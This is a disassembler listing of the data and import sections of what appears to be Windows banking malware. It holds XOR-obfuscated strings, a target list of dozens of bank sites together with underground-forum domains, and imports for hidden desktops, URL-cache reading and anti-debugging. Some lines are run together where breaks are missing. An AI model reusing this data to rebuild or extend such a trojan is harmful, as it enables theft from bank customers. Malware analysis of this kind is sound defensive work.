dd 0D0D3C1C8h, 0FBC2D5C6h, 0D5C4CEEAh, 0C1C8D4C8h, 0CEF0FBD3h
dd 0D0C8C3C9h, 0D2E4FBD4h, 0C9C2D5D5h, 0D5C2F1D3h, 0C9C8CED4h
dd 0D3C9EEFBh, 0C2C9D5C2h, 0C2F487D3h, 0C9CED3D3h
db 0C0h, 0D4h, 0
aI_0 db 'ÎÂß×ËÈÕ‰ÂßÂ',0 ; DATA XREF: sub_406081+245�o
dword_446018 dd 0F4FBD482h, 0D0D3C1C8h, 0FBC2D5C6h, 0D5C4CEEAh, 0C1C8D4C8h
; DATA XREF: sub_406081+219�o
dd 0C9EEFBD3h, 0C9D5C2D3h, 0E287D3C2h, 0C8CBD7DFh, 0FBD5C2D5h
dd 0C9CEC6EAh, 0C6C2E1FBh, 0C2D5D2D3h, 0D3C9C8E4h, 0FBCBC8D5h
dd 0F3E6E2E1h, 0F8E2F5F2h, 0E6E4E8EBh, 0E4E6EAEBh, 0E2E9EEEFh
dd 0E4E8EBF8h, 0F0E8E3ECh
db 0E9h, 0
word_446072 dw 0C2DEh ; DATA XREF: sub_406081+1AF�o
db 0D4h, 0
word_446076 dw 0D5E5h ; DATA XREF: sub_406081+19D�o
dd 0C2D4D0C8h, 0F7D0C2E9h, 0C2C4C8D5h
db 2 dup(0D4h), 0
byte_446087 db 89h ; DATA XREF: sub_406081+18B�o
dd 0E6E1E2E3h, 0FBF3EBF2h, 0F3E1E8F4h, 0E2F5E6F0h, 0C4CEEAFBh
dd 0C8D4C8D5h, 0F0FBD3C1h, 0C8C3C9CEh, 0E4FBD4D0h, 0C2D5D5D2h
dd 0C2F1D3C9h, 0C8CED4D5h, 0DFE2FBC9h, 0D5C8CBD7h, 0E5FBD5C2h
dd 0D4D0C8D5h, 0D0C2E9C2h, 0C4C8D5F7h, 0D4D4C2h
dword_4460D4 dd 0F3E1E8F4h, 0E2F5E6F0h, 0CBC8F7FBh, 0C2CEC4CEh, 0CEEAFBD4h
; DATA XREF: sub_406081+E7�o
dd 0D4C8D5C4h, 0FBD3C1C8h, 0C3C9CEF0h, 0FBD4D0C8h, 0D5D5D2E4h
dd 0F1D3C9C2h, 0CED4D5C2h, 0EEFBC9C8h, 0D5C2D3C9h, 87D3C2C9h
dd 0D3D3C2F4h, 0D4C0C9CEh, 0C9C8FDFBh, 82FBD4C2h
db 0D2h, 0
aCscc db '–‘—–',0 ; DATA XREF: sub_406081+90�o
; sub_406081+BE�o ...
byte_446127 db 0F4h ; DATA XREF: sub_406081+5B�o
dd 0F0F3E1E8h, 0FBE2F5E6h, 0D5C4CEEAh, 0C1C8D4C8h, 0CEF0FBD3h
dd 0D0C8C3C9h, 0D2E4FBD4h, 0C9C2D5D5h, 0D5C2F1D3h, 0C9C8CED4h
dd 0D3C9EEFBh, 0C2C9D5C2h, 0C2F487D3h, 0C9CED3D3h, 0FDFBD4C0h
dd 0D4C2C9C8h, 0D282FBh
aIiS_3 db '›ˆÏÓÊË™',0 ; DATA XREF: sub_4056EE+8B8�o
aIiS_2 db '›ˆÅÈÃÞ™',0 ; DATA XREF: sub_4056EE+89B�o
aIiS_1 db '›ˆÔÄÕÎ×Ó™',0 ; DATA XREF: sub_4056EE+873�o
word_446186 dw 0C2D4h ; DATA XREF: sub_4056EE+80D�o
dd 0CACEF3D3h, 0D3D2C8C2h, 0D482858Fh, 8B858E8Fh, 9C8ED282h
db 0
byte_44619D db 0DAh, 0 ; DATA XREF: sub_4056EE+7F5�o
aIvIPo db 'ÃÈÄÒÊÂÉÓ‰‚Ô‰ÔÒÅÊÎÓŽœ',0 ; DATA XREF: sub_4056EE+7AB�o
aZvPo db 'ÁÒÉÄÓÎÈɇ‚ÔŽÜ',0 ; DATA XREF: sub_4056EE+76F�o
aVVix db '‚Ä‚‰•Ò',0 ; DATA XREF: sub_4056EE+716�o
aIS_2 db '›ÔÄÕÎ×Ó™',0 ; DATA XREF: sub_4056EE+6DE�o
aIiS_0 db '›ˆÁÈÕÊ™',0 ; DATA XREF: sub_4056EE+6C1�o
aIZEEzAas db '›ÎÉ×ÒÓ‡ÓÞך…ÔÒÅÊÎÓ…‡ÑÆËÒš€€™',0 ; DATA XREF: sub_4056EE+6A9�o
aV db '‚ÔÛ',0 ; DATA XREF: sub_4056EE+56F�o
aIZEEzAvAzAvVAs db '›ÎÉ×ÒÓ‡ÓÞך…ÂÃÎÓ…‡ÑÆËÒš€‚Ô€‡ÉÆÊš€‚Ô‚Ò€™›ÅÕ™ª',0
; DATA XREF: sub_4056EE+4A6�o
; sub_4056EE+617�o
aIZEEzAvAzAAsiS db '›ÎÉ×ÒÓ‡ÓÞך…ÂÃÎÓ…‡ÑÆËÒš€‚Ò€‡ÉÆÊš€Æ€™›ÅÕ™ª',0
; DATA XREF: sub_4056EE+328�o
word_44625E dw 0C19Bh ; DATA XREF: sub_4056EE+2DA�o
dd 87CAD5C8h, 0CED3C4C6h, 859AC9C8h, 8785D482h, 0CFD3C2CAh
dd 859AC3C8h, 0F3F4E8F7h, 0C6C98785h, 859AC2CAh, 9985D482h
db 0
aVif db 'Á‚‰”Ò',0 ; DATA XREF: sub_4056EE+288�o
aIS_1 db '›ÅÈÃÞ™',0 ; DATA XREF: sub_4056EE+244�o
aIiS db '›ˆÏÂÆÙ',0 ; DATA XREF: sub_4056EE+221�o
aMicrosoftCorp db 'MicroSoft-Corp',0 ; DATA XREF: sub_4056EE+1E7�o
; sub_4063A9+2A9�o
aISvVIiS db '›ÓÎÓË™‚Ô‚Ò›ˆÓÎÓË™',0 ; DATA XREF: sub_4056EE+1D7�o
aIS_0 db '›ÏÂÆÙ',0 ; DATA XREF: sub_4056EE+1B4�o
aIS db '›ÏÓÊË™',0 ; DATA XREF: sub_4056EE+191�o
aI db '‰ÏÓÊ',0 ; DATA XREF: sub_4056EE+150�o
aVVV db '‚Ô‚Ä‚Ä',0 ; DATA XREF: sub_405600+86�o
; sub_4056EE+424�o
aNin db '‰',0 ; DATA XREF: sub_405409+AC�o
aS db '˜',0 ; DATA XREF: sub_405409+4A�o
aBi db '‰ÀÙ',0 ; DATA XREF: sub_40507F+14D�o
aI_2 db '‰ÀÙ',0 ; DATA XREF: sub_40507F+F7�o
aIUIUIUIUIUIU db 'œÔ‰œžÄÔ‰œžÄÔ‰œžÄÔ‰œžÄÔ‰œžÄÔ‰œžÄÔ',0 ; DATA XREF: sub_40507F+8A�o
byte_44630B db 0FFh ; DATA XREF: sub_40507F+55�o
aBiB db '‰ÀÙ',0
aRgT_3 db 'ƒÏÉÂØÉÞ’',0 ; DATA XREF: sub_404DE3+1BE�o
aRT_0 db 'ÏÉÂØÉÞ’',0 ; DATA XREF: sub_404DE3+191�o
aRgT_2 db 'ƒÊÃÂØ’',0 ; DATA XREF: sub_404DE3+157�o
aRgT_1 db 'ƒÙ’',0 ; DATA XREF: sub_404DE3+12A�o
aRgT_0 db 'ƒÎ’',0 ; DATA XREF: sub_404DE3+FD�o
aRgT db 'ƒÅ’',0 ; DATA XREF: sub_404DE3+C2�o
aRT_1 db 'Å’',0 ; DATA XREF: sub_404DE3+95�o
aRT_3 db 'Ù’',0 ; DATA XREF: sub_404DE3+50�o
aRT_4 db 'Î’',0 ; DATA XREF: sub_404DE3+23�o
aRT db 'ÎÞ’',0 ; DATA XREF: sub_404D49+95�o
aBbtm db '’Œ',0 ; DATA XREF: sub_404BA0+97�o
aRnbbm db 'Œ',0 ; DATA XREF: sub_404A6B+6B�o
aBj db '¡¦',0 ; DATA XREF: sub_40479E+2B4�o
; sub_404DE3+1EB�o
aGgiIIBj db 'ƒƒ‰Ï‰Ï‰Ï¡¦',0 ; DATA XREF: sub_40479E+20D�o
aMiIIMsmiC db 'ÚÍÞŒ‰Ï‰Ï‰ÏŒ‘Œ‰Ù—',0 ; DATA XREF: sub_40479E+11E�o
aMjg db 'Œ†ƒ',0 ; DATA XREF: sub_40479E+E4�o
aII db '‰ß‰Ï',0 ; DATA XREF: sub_40479E+7A�o
; sub_404BA0-91�o ...
aGjm db 'ƒ†Œ',0 ; DATA XREF: sub_40479E+44�o
aBlind_user db 'blind_user',0 ; DATA XREF: sub_404602+6E�o
; sub_4046BD+B�o
byte_44638F db 96h ; DATA XREF: sub_4042A4+28C�o
dd 0F09C93C0h, 0C09693h
dword_446398 dd 0DCDCDF89h, 0F3B9BEC3h, 93DFD6D7h, 0DD8DC096h, 0B9BEDFC6h
; DATA XREF: sub_4042A4+20C�o
dd 93D5DAF3h, 0C0DACBD6h, 0C09693C7h, 0C7DCD493h, 0DCDF93DCh
dd 0B9BEC3DCh, 0DFD6D7F3h, 8DC09693h, 0BEDFC6DDh
db 0B9h, 0
aQA_0 db 'ïÐÜÞÞÒÝ×ÐÜÞ',0 ; DATA XREF: sub_4042A4+19F�o
aCQA_1 db '–ÀïÐÜÞÞÒÝ×ÃÚÕ',0 ; DATA XREF: sub_4042A4+171�o
aCQKA db '–ÀïËÀßÕ×ߊËÑÒÇ',0 ; DATA XREF: sub_4042A4+14C�o
aQA db 'ïÐÞ×ÖËÖ',0 ; DATA XREF: sub_4042A4+FC�o
aCQA_0 db '–ÀïÐÞ×ÃÚÕ',0 ; DATA XREF: sub_4042A4+DC�o
aCQA db '–ÀïËÀßÕ×ßÝÇÑÒÇ',0 ; DATA XREF: sub_4042A4+BC�o
aAhzyoKrcgmAAhz db ']ahzyo|kRCgm|a}ahzRYg`jay}RM{||k`zXk|}ga`R]fkbb]k|xgmkAldkmzJkbow'
; DATA XREF: sub_40409C+78�o
db 'Baoj',0
aOOZckZ db 'O~o|zck`z',0 ; DATA XREF: sub_40409C+45�o
aZfKojgIcajkb db 'Zf|kojg`iCajkb',0 ; DATA XREF: sub_40409C+33�o
byte_446481 db 0 ; DATA XREF: sub_40409C+7�o
; sub_406081+2D6�o ...
aMbGjrRgAmKXk db 'MB]GJR+}RG`^|am]k|xk|=<',0 ; DATA XREF: sub_40403C+28�o
aRJbb db '+}R+} jbb',0 ; DATA XREF: sub_403D6F+23A�o
aUVVVVVVVVs db 'u+>:V+>:V#+>:V#+>:V#+>:V#+>:V+>:V+>:Vs',0 ; DATA XREF: sub_403D6F+3E�o
a_ db '.',0 ; DATA XREF: sub_403BAD+15D�o
aRKvk db '+}R+} kvk',0 ; DATA XREF: sub_403BAD+6E�o
a6v db '+>6V',0 ; DATA XREF: sub_403AC7+8A�o
aBi_0: ; DATA XREF: sub_4038D6+34�o
; .text:004039A1�o ...
unicode 0, <¡›>
byte_4464E0 db 0FBh, 0 ; DATA XREF: sub_4036DA+BC�o
word_4464E2 dw 0E09Ch ; DATA XREF: sub_40352B+4F�o
; sub_4035A9+38�o
db 0
aChevychasebank db 'chevychasebank.com',0 ; DATA XREF: .data:0043B1D4�o
aGronxplanets_r db 'gronxplanets.ru',0 ; DATA XREF: .data:0043B1D0�o
aWww_mdmbank_ru db 'www.mdmbank.ru',0 ; DATA XREF: .data:0043B1CC�o
aFethard_biz db 'fethard.biz',0 ; DATA XREF: .data:0043B1C8�o
aRoyalbank_com db 'royalbank.com',0 ; DATA XREF: .data:0043B1C4�o
aSecuritylab_ru db 'securitylab.ru',0 ; DATA XREF: .data:0043B1C0�o
aTatNeftbank_ru db 'tat-neftbank.ru',0 ; DATA XREF: .data:0043B1BC�o
aSeclab_ru db 'seclab.ru',0 ; DATA XREF: .data:0043B1B8�o
aOpenbank_com db 'openbank.com',0 ; DATA XREF: .data:0043B1B4�o
aGutabank_ru db 'gutabank.ru',0 ; DATA XREF: .data:0043B1B0�o
aWww_b2bTrust_c db 'www.b2b-trust.com',0 ; DATA XREF: .data:0043B1AC�o
aGrepwareFacili db 'grepware-facility.ru',0 ; DATA XREF: .data:0043B1A8�o
aWww_uralsib_ru db 'www.uralsib.ru',0 ; DATA XREF: .data:0043B1A4�o
a53bank_com db '53bank.com',0 ; DATA XREF: .data:0043B1A0�o
aWww_nbc_caInde db 'www.nbc.ca/index.php',0 ; DATA XREF: .data:0043B19C�o
aTotallyfreeban db 'totallyfreebanking.com',0 ; DATA XREF: .data:0043B198�o
aBarclays_com db 'barclays.com',0 ; DATA XREF: .data:0043B194�o
aWww_lbcdirect_ db 'www.lbcdirect.laurentianbank.ca/index.php',0
; DATA XREF: .data:0043B190�o
aKidosBank_ru db 'kidos-bank.ru',0 ; DATA XREF: .data:0043B18C�o
aYambo_biz db 'yambo.biz',0 ; DATA XREF: .data:0043B188�o
aProrat_net db 'prorat.net',0 ; DATA XREF: .data:0043B184�o
aWww1_hsbc_caIn db 'www1.hsbc.ca/index.php',0 ; DATA XREF: .data:0043B180�o
aWww_ovk_ru db 'www.ovk.ru',0 ; DATA XREF: .data:0043B17C�o
aWww_rbc_com db 'www.rbc.com',0 ; DATA XREF: .data:0043B178�o
aMasterX_comFor db 'master-x.com/forum/',0 ; DATA XREF: .data:0043B174�o
aWww_allahabadb db 'www.allahabadbank.com',0 ; DATA XREF: .data:0043B170�o
aOnlineBusiness db 'online-business.lloydstsb.co.uk',0 ; DATA XREF: .data:0043B16C�o
aMyonlineaccoun db 'myonlineaccounts2.abbeynational.co.uk',0 ; DATA XREF: .data:0043B168�o
aWww_absolutban db 'www.absolutbank.ru',0 ; DATA XREF: .data:0043B164�o
aWww_nomos_ru db 'www.nomos.ru',0 ; DATA XREF: .data:0043B160�o
aWww_netmagiste db 'www.netmagister.com',0 ; DATA XREF: .data:0043B15C�o
aWww_kmb_ru db 'www.kmb.ru',0 ; DATA XREF: .data:0043B158�o
aWww_spyinstruc db 'www.spyinstructors.com',0 ; DATA XREF: .data:0043B154�o
aAcroleinHawk_r db 'acrolein-hawk.rubanking.halifax-online.co.uk',0
; DATA XREF: .data:0043B150�o
aWww_icbank_ru db 'www.icbank.ru',0 ; DATA XREF: .data:0043B14C�o
aWww_bankofindi db 'www.bankofindia.com',0 ; DATA XREF: .data:0043B148�o
aPizdabolInc_ru db 'pizdabol-inc.ru',0 ; DATA XREF: .data:0043B144�o
aWww_sbrf_ru db 'www.sbrf.ru',0 ; DATA XREF: .data:0043B140�o
aWww_candidatev db 'www.candidateverifier.com/index.php',0 ; DATA XREF: .data:0043B13C�o
aWww_worldbank_ db 'www.worldbank.org/index.php',0 ; DATA XREF: .data:0043B138�o
aDigitalRelaxkg db 'digital-relaxkgb.ru',0 ; DATA XREF: .data:0043B134�o
aAsmworm_com db 'asmworm.com',0 ; DATA XREF: .data:0043B12C�o
aCrutop_nuVbu_1 db 'crutop.nu/vbulletin/showthread.php',0 ; DATA XREF: .data:0043B124�o
aWww_uniastrum_ db 'www.uniastrum.ru',0 ; DATA XREF: .data:0043B120�o
aCrutop_nuVbu_0 db 'crutop.nu/vbulletin/forumdisplay.php',0 ; DATA XREF: .data:0043B11C�o
aWww_mmbank_ru db 'www.mmbank.ru',0 ; DATA XREF: .data:0043B118�o
aCrutop_nuVbull db 'crutop.nu/vbulletin/',0 ; DATA XREF: .data:0043B114�o
aAlfabank_ru db 'alfabank.ru',0 ; DATA XREF: .data:0043B110�o
aHyperSpaceFuel db 'hyper-space-fuel.ru',0 ; DATA XREF: .data:0043B10C�o
aWww_cwbank_com db 'www.cwbank.com',0 ; DATA XREF: .data:0043B108�o
aWww_vtb_ru db 'www.vtb.ru',0 ; DATA XREF: .data:0043B104�o
aWww_cibc_com db 'www.cibc.com',0 ; DATA XREF: .data:0043B100�o
aWww_bankofmadu db 'www.bankofmadura.com',0 ; DATA XREF: .data:0043B0FC�o
aWww_bmo_com db 'www.bmo.com',0 ; DATA XREF: .data:0043B0F8�o
aWww_bankBanque db 'www.bank-banque-canada.ca/index.php',0 ; DATA XREF: .data:0043B0F4�o
aWww_masterbank db 'www.masterbank.ru',0 ; DATA XREF: .data:0043B0F0�o
aEbookfinaltras db 'ebookfinaltrash.ru',0 ; DATA XREF: .data:0043B0EC�o
aMasterX_com db 'master-x.com',0 ; DATA XREF: .data:0043B0E8�o
aWww_bbin_ru db 'www.bbin.ru',0 ; DATA XREF: .data:0043B0E4�o
aOlb2_nationet_ db 'olb2.nationet.com',0 ; DATA XREF: .data:0043B0E0�o
aWelcome3_smile db 'welcome3.smile.co.uk',0 ; DATA XREF: .data:0043B0DC�o
aWww_baltbank_r db 'www.baltbank.ru',0 ; DATA XREF: .data:0043B0D8�o
aNew_egg_com db 'new.egg.com',0 ; DATA XREF: .data:0043B0D4�o
aProdexteam_n_1 db 'prodexteam.netcrutop.nu',0 ; DATA XREF: .data:0043B0D0�o
aWww_proxySocks db 'www.proxy-socks.net',0 ; DATA XREF: .data:0043B0CC�o
; .data:0043B130�o
aWww_cbr_ru db 'www.cbr.ru',0 ; DATA XREF: .data:0043B0C8�o
aProdexteam_n_0 db 'prodexteam.net/main.htm',0 ; DATA XREF: .data:0043B0C4�o
aProdexteam_net db 'prodexteam.net',0 ; DATA XREF: .data:0043B0C0�o
aAtmacasoft_com db 'atmacasoft.com',0 ; DATA XREF: .data:0043B0BC�o
; .data:0043B128�o
aSiliconfirewar db 'siliconfireware.ru',0 ; DATA XREF: .data:off_43B0B8�o
align 4
dword_446A04 dd 332C4425h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_446A14 dd 3050F1FFh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; sub_406E3F+97B�o
dword_446A24 dd 3050F1F7h, 11CF98B5h, 0AA0082BBh, 0BCEBD00hdword_446A34 dd 332C4427h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_446A44 dd 85CB6900h, 11CF4D95h, 80000C96h, 85EEF4C7hdword_446A54 dd 2 dup(0) dd 0C0h, 46000000h
dword_446A64 dd 0D30C1661h, 11D0CDAFh, 0C0003E8Ah, 6EE2C94Fhdword_446A74 dd 10h dup(0) ; sub_40B73C:loc_40B756�o ...
dword_446AB4 dd 0 ; sub_40B6E0:loc_40B722�o ...
dd 0Fh dup(0)
dword_446AF4 dd 0 ; sub_40B845+825�r
dword_446AF8 dd 0 ; sub_40B845+82C�r
dword_446AFC dd 0 ; sub_40B845+834�r
dword_446B00 dd 0 ; sub_40B845+83C�r
align 800h
_data ends
; Section 4. (virtual address 00047000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00047000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 447000h
off_447000 dd offset dword_44710C ; DATA XREF: .idata:00447E00�o
dd 2 dup(0)
dd offset dword_44710C
dd offset dword_44710C
off_447014 dd offset dword_44711C ; DATA XREF: .idata:00447E10�o
; .idata:00447E14�o
align 10h
dd offset dword_44711C
dd offset dword_44711C
off_447028 dd offset dword_447134 ; DATA XREF: .idata:00447E24�o
; .idata:00447E28�o ...
dd 2 dup(0)
dd offset dword_447134
dd offset dword_447134
off_44703C dd offset dword_447214 ; DATA XREF: .idata:00447E44�o
; .idata:00447E48�o ...
dd 2 dup(0)
dd offset dword_447214
dd offset dword_447214
off_447050 dd offset dword_447290 ; DATA XREF: .idata:00447F28�o
; .idata:00447F2C�o ...
dd 2 dup(0)
dd offset dword_447290
dd offset dword_447290
off_447064 dd offset dword_4472AC ; DATA XREF: .idata:00447FA8�o
; .idata:00447FAC�o ...
align 10h
dd offset dword_4472AC
dd offset dword_4472AC
off_447078 dd offset dword_4472E8 ; DATA XREF: .idata:00447FCC�o
; .idata:00447FD0�o ...
dd 2 dup(0)
dd offset dword_4472E8
dd offset dword_4472E8
off_44708C dd offset dword_447338 ; DATA XREF: .idata:0044800C�o
; .idata:00448010�o ...
dd 2 dup(0)
dd offset dword_447338
dd offset dword_447338
dd 1Ah dup(0)
dd 47574h
dword_44710C dd 2 dup(0) ; .idata:0044700C�o ...
dd 47588h, 475A4h
dword_44711C dd 2 dup(0) ; .idata:00447020�o ...
dd 475C0h, 475D4h, 475E8h, 475F8h
dword_447134 dd 2 dup(0) ; .idata:00447034�o ...
dd 4760Ch, 4761Ch, 47638h, 4764Ch, 47664h, 4767Ch, 4768Ch
dd 4769Ch, 476ACh, 476C4h, 476D8h, 476E8h, 476FCh, 47710h
dd 47728h, 47738h, 47748h, 47758h, 47768h, 47780h, 47798h
dd 477ACh, 477C0h, 477D4h, 477ECh, 477F8h, 47810h, 47820h
dd 47830h, 47844h, 47854h, 47864h, 47870h, 47880h, 47890h
dd 478A0h, 478ACh, 478B8h, 478C8h, 478DCh, 478ECh, 478FCh
dd 47904h, 47918h, 47928h, 47938h, 47948h, 4795Ch, 47974h
dd 47980h, 4798Ch, 47998h, 479A4h, 479B4h
dword_447214 dd 2 dup(0) ; .idata:00447048�o ...
dd 479C4h, 479D8h, 479E8h, 479F8h, 47A04h, 47A14h, 47A20h
dd 47A38h, 47A48h, 47A54h, 47A60h, 47A74h, 47A84h, 47A94h
dd 47AA8h, 47ABCh, 47AD0h, 47AE4h, 47AF8h, 47B0Ch, 47B20h
dd 47B30h, 47B3Ch, 47B50h, 47B60h, 47B74h, 47B84h, 47B94h
dd 47BA8h
dword_447290 dd 2 dup(0) ; .idata:0044705C�o ...
dd 47BBCh, 47BD0h, 47BE0h, 47BF0h, 47C08h
dword_4472AC dd 2 dup(0) ; .idata:00447070�o ...
dd 47C18h, 47C2Ch, 47C44h, 47C58h, 47C68h, 47C78h, 47C8Ch
dd 47CA0h, 47CB4h, 47CC8h, 47CDCh, 47CF8h, 47D10h
dword_4472E8 dd 2 dup(0) ; .idata:00447084�o ...
dd 47D2Ch, 47D34h, 47D44h, 47D50h, 47D5Ch, 47D64h, 47D6Ch
dd 47D78h, 47D84h, 47D90h, 47D98h, 47DA0h, 47DACh, 47DB8h
dd 47DC0h, 47DCCh, 47DD8h, 47DE4h
dword_447338 dd 2 dup(0) ; .idata:00447098�o ...
dword_447340 dd 77124C05h dd 2 dup(0)
dword_44734C dd 42C2DE3Dh ; resolved to->WININET.FindFirstUrlCacheEntryAdword_447350 dd 42C2E399h ; resolved to->WININET.FindNextUrlCacheEntryA dd 2 dup(0)
dword_44735C dd 774FFAC3h dword_447360 dd 7750CB9Ch dword_447364 dd 77502A37h dword_447368 dd 774FEE36h dd 2 dup(0)
dword_447374 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_447378 dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_44737C dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_447380 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessIddword_447384 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_447388 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_44738C dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_447390 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_447394 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_447398 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_44739C dd 7C809B47h ; resolved to->KERNEL32.CloseHandledword_4473A0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_4473A4 dd 7C80ABC1h ; resolved to->KERNEL32.GetProcessHeapdword_4473A8 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_4473AC dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathAdword_4473B0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_4473B4 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4473B8 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_4473BC dd 7C821BA5h ; resolved to->KERNEL32.GetVolumeInformationAdword_4473C0 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_4473C4 dd 7C8360A9h ; resolved to->KERNEL32.GlobalAddAtomAdword_4473C8 dd 7C830BBBh ; resolved to->KERNEL32.GlobalDeleteAtomdword_4473CC dd 7C8360C3h ; resolved to->KERNEL32.GlobalFindAtomAdword_4473D0 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_4473D4 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_4473D8 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrementdword_4473DC dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_4473E0 dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_4473E4 dd 7C813093h ; resolved to->KERNEL32.IsDebuggerPresentdword_4473E8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_4473EC dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_4473F0 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_4473F4 dd 7C80EA1Bh ; resolved to->KERNEL32.OpenMutexAdword_4473F8 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_4473FC dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_447400 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_447404 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_447408 dd 7C90311Bh ; resolved to->NTDLL.RtlZeroMemorydword_44740C dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointerdword_447410 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_447414 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_447418 dd 7C802442h ; resolved to->KERNEL32.Sleepdword_44741C dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_447420 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_447424 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_447428 dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuerydword_44742C dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_447430 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiBytedword_447434 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_447438 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_44743C dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenAdword_447440 dd 7C809A09h ; resolved to->KERNEL32.lstrlenWdword_447444 dd 7C810637h ; resolved to->KERNEL32.CreateThreaddword_447448 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA dd 2 dup(0)
dword_447454 dd 7E43212Bh ; resolved to->USER32.GetWindowTextAdword_447458 dd 7E41B6D4h ; resolved to->USER32.GetWindowRectdword_44745C dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_447460 dd 7E41BC7Dh ; resolved to->USER32.GetWindowdword_447464 dd 7E42F420h ; resolved to->USER32.GetClassNameAdword_447468 dd 7E41DA60h ; resolved to->USER32.SetFocusdword_44746C dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_447470 dd 7E41EF69h ; resolved to->USER32.LoadCursorAdword_447474 dd 7E4208CEh ; resolved to->USER32.LoadIconAdword_447478 dd 7E418C2Eh ; resolved to->USER32.SetTimerdword_44747C dd 7E420A36h ; resolved to->USER32.RegisterClassAdword_447480 dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_447484 dd 7E42E002h ; resolved to->USER32.GetMessageAdword_447488 dd 7E41945Dh ; resolved to->USER32.GetWindowLongAdword_44748C dd 7E41D60Dh ; resolved to->USER32.SetWindowLongAdword_447490 dd 7E455BD7h ; resolved to->USER32.CreateDesktopAdword_447494 dd 7E42E8D1h ; resolved to->USER32.SetThreadDesktopdword_447498 dd 7E419A51h ; resolved to->USER32.GetThreadDesktopdword_44749C dd 7E418BF6h ; resolved to->USER32.TranslateMessagedword_4474A0 dd 7E4196B8h ; resolved to->USER32.DispatchMessageAdword_4474A4 dd 7E42F383h ; resolved to->USER32.SendMessageAdword_4474A8 dd 7E41A8ADh ; resolved to->USER32.wsprintfAdword_4474AC dd 7E42E1D1h ; resolved to->USER32.PostQuitMessagedword_4474B0 dd 7E41D8A4h ; resolved to->USER32.ShowWindowdword_4474B4 dd 7E41FF33h ; resolved to->USER32.CreateWindowExAdword_4474B8 dd 7E41DAEAh ; resolved to->USER32.DestroyWindowdword_4474BC dd 7E41DBECh ; resolved to->USER32.MoveWindowdword_4474C0 dd 7E41D4EEh ; resolved to->USER32.DefWindowProcAdword_4474C4 dd 7E41F642h ; resolved to->USER32.CallWindowProcA align 10h
dword_4474D0 dd 77F161D1h ; resolved to->GDI32.GetStockObjectdword_4474D4 dd 77F15E39h ; resolved to->GDI32.SetBkColordword_4474D8 dd 77F15D87h ; resolved to->GDI32.SetTextColordword_4474DC dd 77F1D991h ; resolved to->GDI32.CreateBrushIndirectdword_4474E0 dd 77F3B730h ; resolved to->GDI32.CreateFontA dd 2 dup(0)
dword_4474EC dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessTokendword_4474F0 dd 77DD7B76h ; resolved to->ADVAPI32.GetTokenInformationdword_4474F4 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_4474F8 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_4474FC dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_447500 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_447504 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_447508 dd 77DF08D5h ; resolved to->ADVAPI32.GetSecurityInfodword_44750C dd 77DF087Fh ; resolved to->ADVAPI32.SetSecurityInfodword_447510 dd 77E215D9h ; resolved to->ADVAPI32.SetEntriesInAclAdword_447514 dd 77DFD4B0h ; resolved to->ADVAPI32.GetSidIdentifierAuthoritydword_447518 dd 77DF9839h ; resolved to->ADVAPI32.GetSidSubAuthoritydword_44751C dd 77DF986Bh ; resolved to->ADVAPI32.GetSidSubAuthorityCount dd 2 dup(0)
